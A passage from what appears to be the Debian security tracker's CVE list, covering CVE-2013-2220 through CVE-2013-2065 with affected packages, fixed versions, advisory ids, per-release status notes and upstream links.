(Minor issue) [wheezy] - libzrtpcpp (Minor issue) CVE-2013-2220 (Buffer overflow in the radius_get_vendor_attr function in the Radius e ...) {DSA-2726-1} - php-radius 1.2.5-2.4 (bug #714362) NOTE: https://www.openwall.com/lists/oss-security/2013/06/28/2 CVE-2013-2219 (The Red Hat Directory Server before 8.2.11-13 and 389 Directory Server ...) - 389-ds-base 1.3.2.9-1 (bug #718325) CVE-2013-2218 (Double free vulnerability in the virConnectListAllInterfaces method in ...) - libvirt 1.1.0-1 (bug #714699) [jessie] - libvirt (Vulnerable code introduced in 1.0.6) [wheezy] - libvirt (Vulnerable code introduced in 1.0.6) [squeeze] - libvirt (Vulnerable code introduced in 1.0.6) NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=244e0b8cf15ca2ef48d82058e728656e6c4bad11 NOTE: Vulnerable code introduced in http://libvirt.org/git/?p=libvirt.git;a=commit;h=7ac2c4fe624f30f2c8270116513fa2ddab07631f CVE-2013-2217 (cache.py in Suds 0.4, when tempdir is set to None, allows local users ...) - suds 0.4.1-8 (low; bug #714340) [squeeze] - suds 0.3.9-1+deb6u1 [wheezy] - suds 0.4.1-5+deb7u1 CVE-2013-2216 RESERVED CVE-2013-2215 REJECTED CVE-2013-2214 (status.cgi in Nagios 4.0 before 4.0 beta4 and 3.x before 3.5.1 does no ...) - nagios3 3.4.1-4 (low) [wheezy] - nagios3 3.4.1-3+deb7u1 [squeeze] - nagios3 (disputed, minor issue) NOTE: Disputed issue; claimed work as designed, may be rejected CVE-2013-2213 (The KRandom::random function in KDE Paste Applet after 4.10.5 in kdepl ...) - kdeplasma-addons (only affects if incomplete patch for CVE-2013-2120 is applied) CVE-2013-2212 (The vmx_set_uc_mode function in Xen 3.3 through 4.3, when disabling ca ...) - xen 4.3.0-1 (unimportant) NOTE: Hardware design flaw, no software solution NOTE: http://xenbits.xen.org/xsa/advisory-60.html CVE-2013-2211 (The libxenlight (libxl) toolstack library in Xen 4.0.x, 4.1.x, and 4.2 ...) {DSA-3006-1} - xen 4.3.0-1 [squeeze] - xen (libxl not packaged in squeeze) CVE-2013-2210 (Heap-based buffer overflow in the XML Signature Reference functionalit ...) {DSA-2717-1} - xml-security-c 1.6.1-7 (bug #714241) NOTE: http://santuario.apache.org/secadv.data/CVE-2013-2210.txt CVE-2013-2209 (Cross-site scripting (XSS) vulnerability in the auto-complete widget i ...) NOT-FOR-US: Reviewboard (this was once in experimental, but removed later on) CVE-2013-2208 (tpp 1.3.1 allows remote attackers to execute arbitrary commands via a ...) - tpp 1.3.1-3 (low; bug #706644) [squeeze] - tpp (Minor issue) [wheezy] - tpp (Minor issue) CVE-2013-2207 (pt_chown in GNU C Library (aka glibc or libc6) before 2.18 does not pr ...) - eglibc [squeeze] - eglibc (Minor issue) [wheezy] - eglibc (Minor issue) - glibc 2.21-1 (low; bug #717544) [jessie] - glibc 2.19-18+deb8u4 NOTE: Patch: https://sourceware.org/git/?p=glibc.git;a=commit;h=e4608715e6e1dd2adc91982fd151d5ba4f761d69 CVE-2013-2206 (The sctp_sf_do_5_2_4_dupcook function in net/sctp/sm_statefuns.c in th ...) {DSA-2766-1} - linux-2.6 - linux 3.9.4-1 [wheezy] - linux 3.2.46-1 CVE-2013-2205 (The default configuration of SWFUpload in WordPress before 3.5.2 has a ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2204 (moxieplayer.as in Moxiecode moxieplayer, as used in the TinyMCE Media ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2203 (WordPress before 3.5.2, when the uploads directory forbids write acces ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2202 (WordPress before 3.5.2 allows remote attackers to read arbitrary files ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2201 (Multiple cross-site scripting (XSS) vulnerabilities in WordPress befor ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2200 (WordPress before 3.5.2 does not properly check the capabilities of rol ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2199 (The HTTP API in WordPress before 3.5.2 allows remote attackers to send ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2198 (The Login Security module 6.x-1.x before 6.x-1.3 and 7.x-1.x before 7. ...) NOT-FOR-US: Login Security Drupal contributed module CVE-2013-2197 (The Login Security module 6.x-1.x before 6.x-1.3 and 7.x-1.x before 7. ...) NOT-FOR-US: Login Security Drupal contributed module CVE-2013-2196 (Multiple unspecified vulnerabilities in the Elf parser (libelf) in Xen ...) {DSA-3006-1} - xen 4.3.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-2195 (The Elf parser (libelf) in Xen 4.2.x and earlier allow local guest adm ...) {DSA-3006-1} - xen 4.3.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-2194 (Multiple integer overflows in the Elf parser (libelf) in Xen 4.2.x and ...) {DSA-3006-1} - xen 4.3.0-1 [squeeze] - xen (Unsupported in squeeze-lts) CVE-2013-2193 (Apache HBase 0.92.x before 0.92.3 and 0.94.x before 0.94.9, when the K ...) NOT-FOR-US: Apache HBase NOTE: There was the package in unstable, but never in a release, see #630821 CVE-2013-2192 (The RPC protocol implementation in Apache Hadoop 2.x before 2.0.6-alph ...) NOT-FOR-US: Apache Hadoop NOTE: There was the package in unstable, but never in a release, see 630820 CVE-2013-2191 (python-bugzilla before 0.9.0 does not validate X.509 certificates, whi ...) NOT-FOR-US: python-bugzilla CVE-2013-2190 (The translate_hierarchy_event function in x11/clutter-device-manager-x ...) - clutter-1.0 1.14.4-3 (low; bug #714264) [squeeze] - clutter-1.0 (Minor issue) [wheezy] - clutter-1.0 (Minor issue) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=701974 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=954054 CVE-2013-2189 (Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to caus ...) - libreoffice 1:3.4.3-1 (unimportant) - openoffice.org 1:3.3.0-1 (unimportant) NOTE: Since 3.3.0 openoffice.org is a transitional source package NOTE: Plain crasher, not treated as security issue CVE-2013-2188 (A certain Red Hat patch to the do_filp_open function in fs/namei.c in ...) - linux-2.6 (RHEL-specific issue) - linux (RHEL-specific issue) CVE-2013-2187 (Cross-site scripting (XSS) vulnerability in Apache Archiva 1.2 through ...) NOT-FOR-US: Apache Archiva CVE-2013-2186 (The DiskFileItem class in Apache Commons FileUpload, as used in Red Ha ...) {DSA-2827-1} - libcommons-fileupload-java 1.3-2.1 (bug #726601) - jenkins 1.565.3-1 (bug #763899) CVE-2013-2185 (** DISPUTED ** The readObject method in the DiskFileItem class in Apac ...) NOT-FOR-US: Red Hat JBoss Enterprise Application Platform NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=974813 NOTE: https://www.openwall.com/lists/oss-security/2013/09/05/4 CVE-2013-2184 (Movable Type before 5.2.6 does not properly use the Storable::thaw fun ...) {DSA-3183-1} - movabletype-opensource 5.2.7+dfsg-1 (bug #712602) [squeeze] - movabletype-opensource (Minor issue) NOTE: http://seclists.org/oss-sec/2013/q2/568 NOTE: http://www.movabletype.org/documentation/appendices/release-notes/movable-type-526-release-notes.html CVE-2013-2183 (Monkey HTTP Daemon has local security bypass ...) - monkey (low) [squeeze] - monkey (Minor issue) CVE-2013-2182 (The Mandril security plugin in Monkey HTTP Daemon (monkeyd) before 1.5 ...) - monkey (low) [squeeze] - monkey (Minor issue) CVE-2013-2181 (Cross-site scripting (XSS) vulnerability in the Directory Listing plug ...) - monkey (low) [squeeze] - monkey (Minor issue) CVE-2013-2180 RESERVED NOT-FOR-US: uk-cookie Wordpress plugin CVE-2013-2179 (X.Org xdm 1.1.10, 1.1.11, and possibly other versions, when performing ...) - xdm (Not affected when PAM is used) [squeeze] - xdm (same as above and glibc too old) [wheezy] - xdm (same as above and glibc too old) NOTE: https://www.openwall.com/lists/oss-security/2013/06/11/5 CVE-2013-2178 (The apache-auth.conf, apache-nohome.conf, apache-noscript.conf, and ap ...) {DSA-2708-1} - fail2ban 0.8.10-1 CVE-2013-2177 (Cross-site scripting (XSS) vulnerability in the Display Suite module 7 ...) NOT-FOR-US: third party drupal module (Display Suite) CVE-2013-2176 (Unquoted Windows search path vulnerability in the Red Hat Enterprise V ...) NOT-FOR-US: Red Hat Enterprise Virtualization Apt service CVE-2013-2175 (HAProxy 1.4 before 1.4.24 and 1.5 before 1.5-dev19, when configured to ...) {DSA-2711-1} - haproxy 1.4.24-1 CVE-2013-2174 (Heap-based buffer overflow in the curl_easy_unescape function in lib/e ...) {DSA-2713-1} - curl 7.31.0-1 CVE-2013-2173 (wp-includes/class-phpass.php in WordPress 3.5.1, when a password-prote ...) {DSA-2718-1} - wordpress 3.5.2+dfsg-1 (bug #713947) CVE-2013-2172 (jcp/xml/dsig/internal/dom/DOMCanonicalizationMethod.java in Apache San ...) {DSA-3065-1 DLA-85-1} - libxml-security-java 1.5.5-2 (bug #720375) NOTE: http://santuario.apache.org/secadv.data/CVE-2013-2172.txt.asc CVE-2013-2171 (The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementati ...) {DSA-2714-1} - kfreebsd-9 9.0-12 (bug #712664) - kfreebsd-8 (Only affects 9.x) CVE-2013-2170 REJECTED CVE-2013-2169 REJECTED CVE-2013-2168 (The _dbus_printf_string_upper_bound function in dbus/dbus-sysdeps-unix ...) {DSA-2707-1} - dbus 1.6.12-1 [squeeze] - dbus (Introduced in 1.4.16) CVE-2013-2167 (python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache s ...) - python-keystoneclient 1:0.2.5-2 (bug #713819) [wheezy] - python-keystoneclient (Vulnerable code not present) CVE-2013-2166 (python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache e ...) - python-keystoneclient 1:0.2.5-2 (bug #713819) [wheezy] - python-keystoneclient (Vulnerable code not present) CVE-2013-2165 (ResourceBuilderImpl.java in the RichFaces 3.x through 5.x implementati ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2013-2164 (The mmc_ioctl_cdrom_read_data function in drivers/cdrom/cdrom.c in the ...) {DSA-2766-1 DSA-2745-1} - linux-2.6 (low) - linux 3.9.8-1 (low) CVE-2013-2163 (Monkey HTTP Daemon (monkeyd) before 1.2.2 allows remote attackers to c ...) - monkey (low) [squeeze] - monkey (Minor issue) CVE-2013-2162 (Race condition in the post-installation script (mysql-server-5.5.posti ...) {DSA-2818-1 DLA-75-1} - mysql-5.5 5.5.35+dfsg-1 (low; bug #711600) - mysql-5.1 (low) [squeeze] - mysql-5.1 (Minor issue, can be included in a future DSA) CVE-2013-2161 (XML injection vulnerability in account/utils.py in OpenStack Swift Fol ...) {DSA-2737-1} - swift 1.8.0-6 (low; bug #712202) [wheezy] - swift 1.4.8-2+deb7u1 CVE-2013-2160 (The streaming XML parser in Apache CXF 2.5.x before 2.5.10, 2.6.x befo ...) NOT-FOR-US: Apache CXF CVE-2013-2159 (Monkey HTTP Daemon: broken user name authentication ...) - monkey [squeeze] - monkey (Minor issue) CVE-2013-2158 (Cross-site request forgery (CSRF) vulnerability in the Services module ...) NOT-FOR-US: Services Drupal contributed modules CVE-2013-2157 (OpenStack Keystone Folsom, Grizzly before 2013.1.3, and Havana, when u ...) - keystone 2013.1.2-1 (bug #712160) [wheezy] - keystone (Vulnerable code not present) CVE-2013-2156 (Heap-based buffer overflow in the Exclusive Canonicalization functiona ...) {DSA-2710-1} - xml-security-c 1.6.1-6 CVE-2013-2155 (Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7. ...) {DSA-2710-1} - xml-security-c 1.6.1-6 CVE-2013-2154 (Stack-based buffer overflow in the XML Signature Reference functionali ...) {DSA-2710-1} - xml-security-c 1.6.1-6 CVE-2013-2153 (The XML digital signature functionality (xsec/dsig/DSIGReference.cpp) ...) {DSA-2710-1} - xml-security-c 1.6.1-6 CVE-2013-2152 (Unquoted Windows search path vulnerability in the SPICE service, as us ...) NOT-FOR-US: Spice service for Windows CVE-2013-2151 (Unquoted Windows search path vulnerability in Red Hat Enterprise Virtu ...) NOT-FOR-US: RHEV Agent for Windows CVE-2013-2150 (Multiple cross-site scripting (XSS) vulnerabilities in js/viewer.js in ...) - owncloud (affects only experimental version) CVE-2013-2149 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 4.0.16debian-1 (bug #711517) CVE-2013-2148 (The fill_event_metadata function in fs/notify/fanotify/fanotify_user.c ...) {DSA-2745-1} - linux-2.6 (low) [squeeze] - linux-2.6 (fanotify introduced in 2.6.36) - linux 3.9.8-1 (low) CVE-2013-2147 (The HP Smart Array controller disk-array driver and Compaq SMART2 cont ...) {DSA-2906-1} - linux-2.6 (low) - linux 3.11.5-1 (low) [wheezy] - linux 3.2.53-1 CVE-2013-2146 (arch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before 3.8. ...) - linux-2.6 (Introduced in 3.1) - linux 3.9.4-1 [wheezy] - linux 3.2.46-1 CVE-2013-2145 (The cpansign verify functionality in the Module::Signature module befo ...) - libmodule-signature-perl 0.73-1 (bug #711239) [wheezy] - libmodule-signature-perl 0.68-1+deb7u1 [squeeze] - libmodule-signature-perl 0.63-1+squeeze1 CVE-2013-2144 (Red Hat Enterprise Virtualization Manager (RHEVM) before 3.2 does not ...) NOT-FOR-US: RHEV Manager CVE-2013-2143 (The users controller in Katello 1.5.0-14 and earlier, and Red Hat Sate ...) NOT-FOR-US: Katello CVE-2013-2142 (userpref.c in libimobiledevice 1.1.4, when $HOME and $XDG_CONFIG_HOME ...) - libimobiledevice 1.1.5-0.1 (low; bug #710885) [squeeze] - libimobiledevice (Vulnerable code was introduced later) [wheezy] - libimobiledevice (Vulnerable code was introduced later) CVE-2013-2141 (The do_tkill function in kernel/signal.c in the Linux kernel before 3. ...) {DSA-2766-1 DSA-2669-1} - linux-2.6 - linux 3.9.4-1 CVE-2013-2140 (The dispatch_discard_io function in drivers/block/xen-blkback/blkback. ...) - linux-2.6 (Vulnerable code not present) - linux 3.10.1-1 [wheezy] - linux (Vulnerable code not present) CVE-2013-2139 (Buffer overflow in srtp.c in libsrtp in srtp 1.4.5 and earlier allows ...) {DSA-2840-1} - srtp 1.4.5~20130609~dfsg-1 (bug #711163) CVE-2013-2138 (The (1) uploadify and (2) flowplayer SWF files in Gallery 3 before 3.0 ...) - gallery (Old 1.5 version not affected) CVE-2013-2137 (Cross-site scripting (XSS) vulnerability in the "View Log" screen in t ...) NOT-FOR-US: Apache OFBiz CVE-2013-2136 (Multiple cross-site scripting (XSS) vulnerabilities in Apache CloudSta ...) NOT-FOR-US: Apache CloudStack CVE-2013-2135 (Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arb ...) - libstruts1.2-java (Only affects 2.x) NOTE: http://struts.apache.org/release/2.3.x/docs/s2-015.html CVE-2013-2134 (Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arb ...) - libstruts1.2-java (Only affects 2.x) NOTE: http://struts.apache.org/release/2.3.x/docs/s2-015.html CVE-2013-2133 (The EJB invocation handler implementation in Red Hat JBossWS, as used ...) NOT-FOR-US: JBoss WS CVE-2013-2132 (bson/_cbsonmodule.c in the mongo-python-driver (aka. pymongo) before 2 ...) {DSA-2705-1} - pymongo 2.5.2-1 (bug #710597) [squeeze] - pymongo (bson module not present) NOTE: https://jira.mongodb.org/browse/PYTHON-532 NOTE: https://github.com/mongodb/mongo-python-driver/commit/a060c15ef87e0f0e72974c7c0e57fe811bbd06a2 CVE-2013-2131 (Format string vulnerability in the rrdtool module 1.4.7 for Python, as ...) - rrdtool 1.4.8-1 (unimportant; bug #708866) NOTE: Non-issue, calling application need to perform sanitising CVE-2013-2130 (ZNC 1.0 allows remote authenticated users to cause a denial of service ...) - znc 1.0-5 (bug #720632) [squeeze] - znc (Vulnerable code not present) [wheezy] - znc (Vulnerable code not present) CVE-2013-2129 (Cross-site scripting (XSS) vulnerability in the Webform module 6.x-3.x ...) NOT-FOR-US: Webform Drupal contributed module CVE-2013-2128 (The tcp_read_sock function in net/ipv4/tcp.c in the Linux kernel befor ...) - linux-2.6 [squeeze] - linux-2.6 2.6.32-24 - linux 2.6.35-1~experimental.1 NOTE: https://git.kernel.org/linus/baff42ab1494528907bf4d5870359e31711746ae CVE-2013-2127 (Buffer overflow in the exposure correction code in LibRaw before 0.15. ...) - libraw (Only affects 0.15, 0.15 was only in experimental) - libkdcraw (embeds libraw 0.14) - darktable (embeds libraw 0.14) NOTE: https://www.openwall.com/lists/oss-security/2013/05/28/3 NOTE: https://github.com/LibRaw/LibRaw/commit/2f912f5b33582961b1cdbd9fd828589f8b78f21d CVE-2013-2126 (Multiple double free vulnerabilities in the LibRaw::unpack function in ...) - libraw 0.15.3-1 (low; bug #710353) [wheezy] - libraw (Not suitable for code injection, minor issue) [squeeze] - libraw (Vulnerable code not present) - libkdcraw 4:4.8.4-2 (low; bug #711317) [wheezy] - libkdcraw (Not suitable for code injection, minor issue) - darktable 1.2.1-2 (unimportant; bug #711316) NOTE: Not suitable for code injection, no security impact for an enduser application like Darktable - kdegraphics [squeeze] - kdegraphics (embedded version of kdcraw+libraw too old) NOTE: https://www.openwall.com/lists/oss-security/2013/05/28/3 NOTE: https://github.com/LibRaw/LibRaw/commit/19ffddb0fe1a4ffdb459b797ffcf7f490d28b5a6 CVE-2013-2125 (OpenSMTPD before 5.3.2 does not properly handle SSL sessions, which al ...) - opensmtpd 5.3.3p1-1 NOTE: https://www.openwall.com/lists/oss-security/2013/05/18/8 CVE-2013-2124 (Double free vulnerability in inspect-fs.c in LibguestFS 1.20.x before ...) - libguestfs 1:1.20.8-1 (bug #710290) [wheezy] - libguestfs (Vulnerable code not present) NOTE: Introduced with commit https://github.com/libguestfs/libguestfs/commit/5a3da366268825b26b470cde35658b67c1d11cd4 CVE-2013-2123 (The Node access user reference module 6.x-3.x before 6.x-3.5 and 7.x-3 ...) NOT-FOR-US: Node access user reference Drupal contributed module CVE-2013-2122 (The Edit Limit module 7.x-1.x before 7.x-1.3 for Drupal does not prope ...) NOT-FOR-US: Edit Limit Drupal contributed module CVE-2013-2121 (Eval injection vulnerability in the create method in the Bookmarks con ...) - foreman (bug #663101) CVE-2013-2120 (The %{password(...)} macro in pastemacroexpander.cpp in the KDE Paste ...) - kdeplasma-addons 4:5.3.2-2 (low; bug #710497) [jessie] - kdeplasma-addons (Minor issue) [wheezy] - kdeplasma-addons (Minor issue) [squeeze] - kdeplasma-addons (Minor issue) NOTE: Original fix https://projects.kde.org/projects/kde/kdeplasma-addons/repository/revisions/36a1fe49cb70f717c4a6e9eeee2c9186503a8dce not sufficient CVE-2013-2119 (Phusion Passenger gem before 3.0.21 and 4.0.x before 4.0.5 for Ruby al ...) - ruby-passenger 3.0.13debian-1.1 (low; bug #710351) [wheezy] - ruby-passenger 3.0.13debian-1+deb7u1 CVE-2013-2118 (SPIP 3.0.x before 3.0.9, 2.1.x before 2.1.22, and 2.0.x before 2.0.23 ...) {DSA-2694-1} - spip 2.1.22-1 (bug #709674) CVE-2013-2117 (Directory traversal vulnerability in the cgit_parse_readme function in ...) - cgit (Fixed before the initial upload into the archive) CVE-2013-2116 (The _gnutls_ciphertext2compressed function in lib/gnutls_cipher.c in G ...) {DSA-2697-1} - gnutls26 2.12.23-5 (bug #709301) [squeeze] - gnutls26 (vulnerable code not backported) CVE-2013-2115 (Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arb ...) - libstruts1.2-java (Only affects Struts 2) CVE-2013-2114 (Unrestricted file upload vulnerability in the chunk upload API in Medi ...) - mediawiki 1:1.19.7+dfsg-1 [squeeze] - mediawiki (Vulnerable code not present) CVE-2013-2113 (The create method in app/controllers/users_controller.rb in Foreman be ...) - foreman (bug #663101) CVE-2013-2112 (The svnserve server in Subversion before 1.6.23 and 1.7.x before 1.7.1 ...) {DSA-2703-1} - subversion 1.7.9-1+nmu2 (bug #711033) NOTE: http://subversion.apache.org/security/CVE-2013-2112-advisory.txt CVE-2013-2111 (The IMAP functionality in Dovecot before 2.2.2 allows remote attackers ...) - dovecot (vulnerable code appeared in 2.2) [squeeze] - dovecot (vulnerable code appeared in 2.2) [wheezy] - dovecot (vulnerable code appeared in 2.2) CVE-2013-2110 (Heap-based buffer overflow in the php_quot_print_encode function in ex ...) - php5 5.5.0~rc3+dfsg-1 [wheezy] - php5 (Vulnerable code not present) [squeeze] - php5 (Vulnerable code not present) NOTE: https://github.com/php/php-src/commit/93e0d78ec655f59ebfa82b2c6f8486c43651c1d0 NOTE: vulnerability introduced with commit https://git.php.net/?p=php-src.git;a=commitdiff;h=18bb426587d62f93c54c40bf8535eb8416603629 CVE-2013-2109 (WordPress plugin wp-cleanfix has Remote Code Execution ...) NOT-FOR-US: WordPress plugin wp-cleanfix CVE-2013-2108 (WordPress WP Cleanfix Plugin 2.4.4 has CSRF ...) NOT-FOR-US: WordPress plugin wp-cleanfix CVE-2013-2107 (Cross-site request forgery (CSRF) vulnerability in the Mail On Update ...) NOT-FOR-US: WordPress plugin mail-on-update CVE-2013-2106 (webauth before 4.6.1 has authentication credential disclosure ...) - webauth (vulnerable code only in 4.4.1 up to 4.5.2) CVE-2013-2105 (The Show In Browser (show_in_browser) gem 0.0.3 for Ruby allows local ...) NOT-FOR-US: Show In Browser Ruby Gem CVE-2013-2104 (python-keystoneclient before 0.2.4, as used in OpenStack Keystone (Fol ...) - keystone (Vulnerable code only in experimental versions of keystone) [wheezy] - keystone (PKI token support not yet present) - python-keystoneclient 1:0.2.5-1 [wheezy] - python-keystoneclient (vulnerable code not present) NOTE: Keystone Folsom fix: https://review.openstack.org/#/c/30743/ NOTE: python-keystoneclient fix: https://review.openstack.org/#/c/30742/ NOTE: Starting with 2013.1-1 code in keystone/middleware/auth_token.py moved to python-keystoneclient CVE-2013-2103 (OpenShift cartridge allows remote URL retrieval ...) NOT-FOR-US: OpenShift CVE-2013-2102 (The default configuration of Red Hat JBoss Portal before 6.1.0 enables ...) NOT-FOR-US: GateIn Portal CVE-2013-2101 (Katello has multiple XSS issues in various entities ...) NOT-FOR-US: Katello CVE-2013-2100 (The urlopen function in pym/portage/util/_urlopen.py in Gentoo Portage ...) NOT-FOR-US: Gentoo Portage binary package installer CVE-2013-2099 (Algorithmic complexity vulnerability in the ssl.match_hostname functio ...) {DLA-1107-1} - python2.7 2.7.5-5 (low; bug #709066) [wheezy] - python2.7 (Backport was introduced in 2.7.3-11) - linkchecker 8.5-1 (low; bug #709067) [wheezy] - linkchecker (Minor issue) [squeeze] - linkchecker (Minor issue) - python3.2 (low; bug #708530) [wheezy] - python3.2 (Minor issue) - python3.3 3.3.2-3 (low; bug #708530) - python2.6 (Introduced in Python 3.2) - python2.5 (Introduced in Python 3.2) - python3.1 (Introduced in Python 3.2) - bzr 2.6.0~bzr6574-1 (low; bug #709068) [squeeze] - bzr (Minor issue) - python-urllib3 1.6-2 (low; bug #709070) [wheezy] - python-urllib3 (Minor issue) - python-tornado 2.4.1-3 (low; bug #709069) [wheezy] - python-tornado (Minor issue) [squeeze] - python-tornado (Minor issue) - w3af (low; bug #709071) [jessie] - w3af (Minor issue) [wheezy] - w3af (Minor issue) [squeeze] - w3af (Minor issue) - u1db 13.10-1 (low; bug #709486) CVE-2013-2098 REJECTED CVE-2013-2097 (ZPanel through 10.1.0 has Remote Command Execution ...) NOT-FOR-US: zPanel CVE-2013-2096 (OpenStack Compute (Nova) Folsom, Grizzly, and Havana does not verify t ...) - nova 2013.1.2-2 (low; bug #710157) [wheezy] - nova (Minor issue) CVE-2013-2095 (rubygem-openshift-origin-controller: API can be used to create applica ...) NOT-FOR-US: openshift-origin-controller Ruby Gem CVE-2013-2094 (The perf_swevent_init function in kernel/events/core.c in the Linux ke ...) {DSA-2669-1} - linux 3.8.11-1 [squeeze] - linux-2.6 (Vulnerable code not present) CVE-2013-2093 (Dolibarr ERP/CRM 3.3.1 does not properly validate user input in viewim ...) - dolibarr 3.3.4-1 (high) CVE-2013-2092 (Cross-site Scripting (XSS) in Dolibarr ERP/CRM 3.3.1 allows remote att ...) - dolibarr 3.3.4-1 CVE-2013-2091 (SQL injection vulnerability in Dolibarr ERP/CRM 3.3.1 allows remote at ...) - dolibarr 3.3.4-1 CVE-2013-2090 (The set_meta_data function in lib/cremefraiche.rb in the Creme Fraiche ...) NOT-FOR-US: Creme Fraiche Ruby Gem CVE-2013-2089 (Incomplete blacklist vulnerability in ownCloud before 5.0.6 allows rem ...) - owncloud (Only affects 5.0.x) CVE-2013-2088 (contrib/hook-scripts/svn-keyword-check.pl in Subversion before 1.6.23 ...) - subversion 1.7.5-1 (unimportant) NOTE: 1.7.5 upstream does not ship anymore the contrib/ directory NOTE: both affected tools not installed into the binary packages CVE-2013-2087 (Multiple cross-site scripting (XSS) vulnerabilities in Gallery 3 befor ...) - gallery (Vulnerable code not present) CVE-2013-2086 (The configuration loader in ownCloud 5.0.x before 5.0.6 allows remote ...) - owncloud (Only owncloud 5.0.x) CVE-2013-2085 (Directory traversal vulnerability in apps/files_trashbin/index.php in ...) - owncloud (Only affects 5.0.x) CVE-2013-2084 RESERVED CVE-2013-2083 (The MoodleQuickForm class in lib/formslib.php in Moodle through 2.1.10 ...) - moodle 2.5-1 (low) [squeeze] - moodle (Minor issue) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38885 CVE-2013-2082 (Moodle through 2.1.10, 2.2.x before 2.2.10, 2.3.x before 2.3.7, and 2. ...) - moodle 2.5-1 (low) [squeeze] - moodle (Minor issue) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37245 CVE-2013-2081 (Moodle through 2.1.10, 2.2.x before 2.2.10, 2.3.x before 2.3.7, and 2. ...) - moodle 2.5-1 (low) [squeeze] - moodle (Minor issue) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37822 CVE-2013-2080 (The core_grade component in Moodle through 2.2.10, 2.3.x before 2.3.7, ...) - moodle 2.5-1 (low) [squeeze] - moodle (Minor issue) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-37475 CVE-2013-2079 (mod/assign/locallib.php in the assignment module in Moodle 2.3.x befor ...) - moodle (Only affects 2.3 and later) NOTE: http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-38443 CVE-2013-2078 (Xen 4.0.2 through 4.0.4, 4.1.x, and 4.2.x allows local PV guest users ...) {DSA-3006-1} - xen 4.2.2-1 [squeeze] - xen (No PVSAVE support in squeeze) NOTE: http://lists.xen.org/archives/html/xen-announce/2013-06/msg00000.html CVE-2013-2077 (Xen 4.0.x, 4.1.x, and 4.2.x does not properly restrict the contents of ...) {DSA-3006-1} - xen 4.2.2-1 [squeeze] - xen (Unsupported in squeeze-lts) NOTE: http://lists.xen.org/archives/html/xen-announce/2013-06/msg00001.html CVE-2013-2076 (Xen 4.0.x, 4.1.x, and 4.2.x, when running on AMD64 processors, only sa ...) {DSA-3006-1} - xen 4.2.2-1 [squeeze] - xen (Unsupported in squeeze-lts) NOTE: http://lists.xen.org/archives/html/xen-announce/2013-06/msg00002.html CVE-2013-2075 (Multiple buffer overflows in the (1) R5RS char-ready, (2) tcp-accept-r ...) - chicken (Incomplete fix was never applied) CVE-2013-2074 (kioslave/http/http.cpp in KIO in kdelibs 4.10.3 and earlier allows att ...) {DLA-952-1} - kde4libs 4:4.10.5-1 (low; bug #707776) [squeeze] - kde4libs (Minor issue) NOTE: https://bugs.kde.org/show_bug.cgi?id=319428 NOTE: https://github.com/KDE/kdelibs/commit/65d736dab592bced4410ccfa4699de89f78c96ca NOTE: https://github.com/KDE/kdelibs/commit/898135a59d91184692ed1bcee8bb4c6d80d6f7b9 CVE-2013-2073 (Transifex command-line client before 0.9 does not validate X.509 certi ...) - transifex-client 0.9-1 (low) [wheezy] - transifex-client (Minor issue) NOTE: http://seclists.org/oss-sec/2013/q2/394 CVE-2013-2072 (Buffer overflow in the Python bindings for the xc_vcpu_setaffinity cal ...) {DSA-3041-1} - xen 4.2.2-1 (low) [squeeze] - xen (Minor issue, can be postponed to the next Xen DSA) [wheezy] - xen (Minor issue, can be postponed to the next Xen DSA) CVE-2013-2071 (java/org/apache/catalina/core/AsyncContextImpl.java in Apache Tomcat 7 ...) {DSA-2897-1} - tomcat7 7.0.40-1 (bug #707704) NOTE: https://issues.apache.org/bugzilla/show_bug.cgi?id=54178 CVE-2013-2070 (http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and ...) {DSA-2721-1} - nginx 1.4.1-1 (bug #708164) [squeeze] - nginx (Vulnerable code not present) CVE-2013-2069 (Red Hat livecd-tools before 13.4.4, 17.x before 17.17, 18.x before 18. ...) NOT-FOR-US: Red Hat livecd-tools NOTE: https://www.openwall.com/lists/oss-security/2013/05/23/2 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=964299 CVE-2013-2068 (Multiple directory traversal vulnerabilities in the AgentController in ...) NOT-FOR-US: RedHat CloudForms Management Engine CVE-2013-2067 (java/org/apache/catalina/authenticator/FormAuthenticator.java in the f ...) {DSA-2897-1 DSA-2725-1} - tomcat7 7.0.33 - tomcat6 6.0.37 CVE-2013-2066 (Buffer overflow in X.org libXv 1.0.7 and earlier allows X servers to c ...) {DSA-2674-1} - libxv 2:1.0.7-1+deb7u1 CVE-2013-2065 ((1) DL and (2) Fiddle in Ruby 1.9 before 1.9.3 patchlevel 426, and 2.0 ...) {DLA-235-1} - 